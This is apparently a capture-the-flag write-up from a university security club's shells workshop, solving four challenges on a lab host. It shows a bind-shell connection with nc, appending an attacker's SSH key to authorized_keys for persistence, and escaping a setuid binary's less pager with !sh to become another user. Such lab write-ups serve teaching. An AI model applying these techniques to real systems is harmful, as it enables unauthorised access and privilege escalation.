UQ Cyber Squad 0x03 Shells


Introduction

0x03 Shells session presented by the UQ Cyber Squad. Access via OpenVPN connection. OpenVPN configuration bundle provided during the workshop.

Challenge 1 - Family Binding Time - 10pts

Let’s bind together at 192.168.57.11:8297

nc 192.168.57.11 8297
id
uid=1002(user) gid=1002(user) groups=1002(user)
pwd
/home/user
ls -las
total 60
 4 drwxr-xr-x 3 user    user  4096 Mar 27 06:02 .
 4 drwxr-xr-x 4 root    root  4096 Mar 24 02:13 ..
 4 -rw------- 1 user    user  1584 Mar 26 01:26 .bash_history
 4 -rw------- 1 user    user   105 Mar 26 00:50 .lesshst
 4 -rw------- 1 user    user     5 Mar 24 03:38 .python_history
 4 drwxr-xr-x 2 user    user  4096 Mar 26 00:59 .ssh
 8 -rw------- 1 user    user  5066 Mar 27 06:01 .viminfo
 4 -r-xr-xr-x 1 root    user   892 Mar 27 06:02 init_shell.py
20 -rwsr-xr-x 1 richard root 16728 Mar 26 00:54 read_secret_message
 4 -rw-r--r-- 1 user    user    24 Mar 24 02:14 user.txt
cat user.txt	
flag{n1c3_b0nd1ng_t1m3}

Challenge 2 - shhhhhhhh - 20pts

How do I ssshhhhh? How do I know how to?

  • I actually got to this one last because the hint was very ambiguous, and I just happened to check the ssh daemon configuration sshd_config file.
cat /etc/ssh/sshd_config 
#	$OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin yes
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

# flag{c0nf1gur3d_pr0p3rly}

#PubkeyAuthentication yes

# Expect .ssh/authorized_keys2 to be disregarded by default in future.
#AuthorizedKeysFile	.ssh/authorized_keys .ssh/authorized_keys2

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication yes
#PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
#PrintLastLog yes
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

# override default of no subsystems
Subsystem	sftp	/usr/lib/openssh/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#	X11Forwarding no
#	AllowTcpForwarding no
#	PermitTTY no
#	ForceCommand cvs server
  • Submitted: flag{c0nf1gur3d_pr0p3rly}

Challenge 3 - Mr Richard - 20pts

More is less for Mr Richard

  • Generate a local RSA keypair using the ssh_keygen command for the user on the parrot host
  • Manually copied the generated public key into the authorised_keys file by copying and pasting into the terminal window
ls -l ./.ssh/
total 4
-rw-r--r-- 1 user user 563 Mar 26 00:59 authorized_keys
cat ./.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDViXPD0mL2mR03VSqXgSv0vOvjaVTudElLEkAOkiKzgicvJoJiJyx/Qu3FbCN5Y5iDhKZT7L7wzEGo178U9QdJbpq3Go+ULQ8cky96ZvU605+7CQmpcqu6xGuoApJz/V3KgTlRcmA8DJLEPMSWYpp8yrTyTkzcu24Z/YrHxoLKkQP/paj1y1/RnewUk/8/N3AoeJTD/RInPXufZX1/Cq+eonyt/lWV3ypZrUGls3KEFSGbSH6dHSypld2CNUNJxz5KmXg8M8bNXIEfLPzluREP9bNULh1gXbcfHqKoI+gKV4ZeodECwb1QSjvKaJffr1LtnHnt+mK6eJEjt7RKRqHc/vzEklt/xOGH+B6/Xjoc2b8K8I2tV9dHIhBqG8CT2NF0E/qqzbCAmwI2fPuZNUApZBx/oASabssONUvzD8vT0tW9HhnfD8MFHVJZWs1hG5pjP4V41Js8OEvqflFiqLsyqiGsZkn0R2HpsLEXIfC+2pjIYkr0RWtMpruwJOKHPPE= [email protected]
netstat -tln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 192.168.57.11:8297      0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp6       0      0 :::80                   :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJnrpgXGIVZnw5zdTZMc5a7bXafaA9GxT2X5ZcO8UBYsSnTHRTl/jcxlHbvghDnNyl51N6McIrCNxjn+SmdxV9zz6LFe2a6pBCGWYGot7sfIXte4LOSXAZZHz0O6GjSR91gJv6sDpo8TTq8/J/VKLzmRA3fIounLunDpOxhRgBa6rG1QXuNm6PBBcYaxL69ygGKR630RmaxKxYvSkHB126AmYi+8hBXvnsDtfg6BX9koIJP3aNyek/7VPrTAn3peV/H7uvWGDZOYoSRCwuMYEFQcyJfI0R382wWCMWaMMyamTTYepyt9tiqGKl5DZzErfhTpyXHzql/Due4I9aRuWo7naJ8AesIw5vdYXvkPwfvEiFRiK1HFde/5+5a7uEJev1q1kL5S77Kjr/Bo3FVRvxfMqsByOlQc7ME60AnKXtxOAzbyFRjXDaTKZcmNMeUoV42ogATxY2RHDHGrvMdRR5qB4AldGwLKFump0ekWUy6Gx/wT/GRnX/4ml1ods7B2s= [email protected]" >> ./.ssh/authorized_keys
cat ./.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDViXPD0mL2mR03VSqXgSv0vOvjaVTudElLEkAOkiKzgicvJoJiJyx/Qu3FbCN5Y5iDhKZT7L7wzEGo178U9QdJbpq3Go+ULQ8cky96ZvU605+7CQmpcqu6xGuoApJz/V3KgTlRcmA8DJLEPMSWYpp8yrTyTkzcu24Z/YrHxoLKkQP/paj1y1/RnewUk/8/N3AoeJTD/RInPXufZX1/Cq+eonyt/lWV3ypZrUGls3KEFSGbSH6dHSypld2CNUNJxz5KmXg8M8bNXIEfLPzluREP9bNULh1gXbcfHqKoI+gKV4ZeodECwb1QSjvKaJffr1LtnHnt+mK6eJEjt7RKRqHc/vzEklt/xOGH+B6/Xjoc2b8K8I2tV9dHIhBqG8CT2NF0E/qqzbCAmwI2fPuZNUApZBx/oASabssONUvzD8vT0tW9HhnfD8MFHVJZWs1hG5pjP4V41Js8OEvqflFiqLsyqiGsZkn0R2HpsLEXIfC+2pjIYkr0RWtMpruwJOKHPPE= [email protected]
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJnrpgXGIVZnw5zdTZMc5a7bXafaA9GxT2X5ZcO8UBYsSnTHRTl/jcxlHbvghDnNyl51N6McIrCNxjn+SmdxV9zz6LFe2a6pBCGWYGot7sfIXte4LOSXAZZHz0O6GjSR91gJv6sDpo8TTq8/J/VKLzmRA3fIounLunDpOxhRgBa6rG1QXuNm6PBBcYaxL69ygGKR630RmaxKxYvSkHB126AmYi+8hBXvnsDtfg6BX9koIJP3aNyek/7VPrTAn3peV/H7uvWGDZOYoSRCwuMYEFQcyJfI0R382wWCMWaMMyamTTYepyt9tiqGKl5DZzErfhTpyXHzql/Due4I9aRuWo7naJ8AesIw5vdYXvkPwfvEiFRiK1HFde/5+5a7uEJev1q1kL5S77Kjr/Bo3FVRvxfMqsByOlQc7ME60AnKXtxOAzbyFRjXDaTKZcmNMeUoV42ogATxY2RHDHGrvMdRR5qB4AldGwLKFump0ekWUy6Gx/wT/GRnX/4ml1ods7B2s= [email protected]
  • Attempted to SSH onto the host using the private key as the user user.
ssh -i user_rsa [email protected]
Linux Tom 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 26 00:59:42 2020 from 192.168.57.3
$ id
uid=1002(user) gid=1002(user) groups=1002(user)
$ ls -las
total 60
 4 drwxr-xr-x 3 user    user  4096 Mar 27 06:02 .
 4 drwxr-xr-x 4 root    root  4096 Mar 24 02:13 ..
 4 -rw------- 1 user    user  1584 Mar 26 01:26 .bash_history
 4 -r-xr-xr-x 1 root    user   892 Mar 27 06:02 init_shell.py
 4 -rw------- 1 user    user   105 Mar 26 00:50 .lesshst
 4 -rw------- 1 user    user     5 Mar 24 03:38 .python_history
20 -rwsr-xr-x 1 richard root 16728 Mar 26 00:54 read_secret_message
 4 drwxr-xr-x 2 user    user  4096 Mar 26 00:59 .ssh
 4 -rw-r--r-- 1 user    user    24 Mar 24 02:14 user.txt
 8 -rw------- 1 user    user  5066 Mar 27 06:01 .viminfo
  • Ran the read_secret_message command, ran strings on the command and assumed it was running the less command, resize the terminal window to cause paging in less, then escaped out using !sh. Once out, grabbed the richard flag.
$ ./read_secret_message
$ id
uid=1001(richard) gid=1002(user) groups=1002(user)
$ pwd
/home/user
$ cd ../richard
$ ls -las
total 56
 4 drwxr-xr-x 3 richard richard  4096 Mar 26 01:00 .
 4 drwxr-xr-x 4 root    root     4096 Mar 24 02:13 ..
 4 -rw------- 1 richard richard  1233 Mar 26 01:09 .bash_history
 4 -rw------- 1 richard richard    34 Mar 24 03:07 .lesshst
 4 -rw-r--r-- 1 root    root      597 Mar 24 03:05 message.txt
20 -rwsr-xr-x 1 richard root    16728 Mar 26 00:53 read_secret_message
 4 -rw-r----- 1 richard richard   210 Mar 26 00:53 read_secret_message.c
 4 -rw-r----- 1 richard richard    22 Mar 24 02:45 richard.txt
 4 drwxr-xr-x 2 richard user     4096 Mar 26 01:00 .ssh
 4 -rw------- 1 richard richard  1662 Mar 24 03:22 .viminfo
$ cat richard.txt
flag{1_4m_mr_r1ch4rd}

Challenge 4 - Too Much T Mux - 20pts

There’s so many!!!

  • Listed the tmux sessions using the tmux ls command
  • Manually attached to each session to find the flag using the tmux a -t session_name command
  • Found the flag in
tmux ls
bluh: 1 windows (created Tue Mar 24 02:47:54 2020) [238x48]
find_me: 1 windows (created Tue Mar 24 02:48:24 2020) [238x48]
goodluck: 1 windows (created Tue Mar 24 02:48:11 2020) [238x48]
hahahahaha: 1 windows (created Tue Mar 24 02:48:02 2020) [238x48]
j: 1 windows (created Tue Mar 24 02:51:36 2020) [238x48]
this_is_evil: 1 windows (created Tue Mar 24 02:48:57 2020) [238x48]
[email protected]:~$ tmux a -t goodluck
[detached (from session goodluck)]
  • Submitted: flag{d3ep_d0wn_und3r}

See also